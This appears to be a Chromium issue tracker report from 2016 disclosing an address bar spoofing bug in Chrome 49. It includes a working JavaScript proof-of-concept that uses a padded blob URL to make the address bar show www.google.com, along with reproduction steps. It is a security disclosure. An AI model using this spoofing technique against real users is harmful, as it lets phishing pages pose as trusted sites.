Issue metadata
Sign in to add a comment
|
Adddress bar better spoofing via blob URL
Reported by
masa....@gmail.com,
Apr 21 2016
|
||||||||||||||||||||
Issue descriptionUserAgent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36 Steps to reproduce the problem: 1. Visit POC.html (https://output.jsbin.com/yeloqaf/): <script> function poc(){ w=window.open('about:blank','_blank'); w.eval('setTimeout("opener.document.write(/pkav~/);opener.focus();window.close();",2000)'); setTimeout("location='blob:"+location.protocol+"//www.google.com"+Array(1000).join(' ')+'@'+location.host+"';",1000) } </script> <button onclick="poc()">Boom!</button> 2. Click button 'Boom!'. 3. Wait 1s, see address bar What is the expected behavior? Address Bar display: yourdomain What went wrong? Address Bar display: blob:https://www.google.com Did this work before? No Chrome version: 49.0.2623.112 Channel: stable OS Version: 10.0 Flash Version: Shockwave Flash 21.0 r0 The POC works in Chrome for Windows and Chrome for Android, But Chrome for OSX have a '...':)
,
Apr 21 2016
What happened?
,
Apr 21 2016
,
Oct 2 2016
,
Apr 23 2017
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot |
|||||||||||||||||||||
►
Sign in to add a comment |
|||||||||||||||||||||
Comment 1 by masa....@gmail.com
, Apr 21 2016